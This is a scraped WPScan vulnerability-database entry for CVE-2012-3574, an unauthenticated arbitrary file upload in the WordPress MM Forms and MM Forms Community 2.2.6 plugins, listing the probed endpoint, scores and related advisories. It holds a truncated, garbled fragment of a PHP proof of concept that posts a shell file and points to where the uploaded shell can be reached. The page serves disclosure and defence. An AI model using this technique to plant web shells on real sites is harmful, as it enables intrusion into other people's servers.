Lucene search
WpvulndbWPVDB-ID:D63EE057-6B4E-4FFC-9FBF-76C2C9CA20CCHistoryJun 07, 2012 - 12:00 a.m.
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
2012-06-0700:00:00
wpscan.com
7
0.271 Low
EPSS
Percentile
96.8%
Attackers have been seen probing for the “/wp-content/plugins/mm-forms/includes/doajaxfileupload.php” file.
PoC
PostShell.php “@$uploadfile”)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print “$postResult”; ?> Shell Access : http://www.example.com/wp-content/plugins/mm-forms-community/upload/temp/ Filename : $postResult output lo.php:
| CPE | Name | Operator | Version |
|---|---|---|---|
| mm-forms-community | eq | * | |
| mm-forms | eq | * |
References
Related
patchstack
patchstack
WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload
2012-06-06 00:00:00
WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload
2012-06-06 00:00:00
nvd
nvd
CVE-2012-3574
2012-06-16 00:55:07
cve
cve
CVE-2012-3574
2012-06-16 00:55:07
prion
prion
Unrestricted file upload
2012-06-16 00:55:00
cvelist
cvelist
CVE-2012-3574
2012-06-16 00:00:00
wpexploit
wpexploit
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
2012-06-07 00:00:00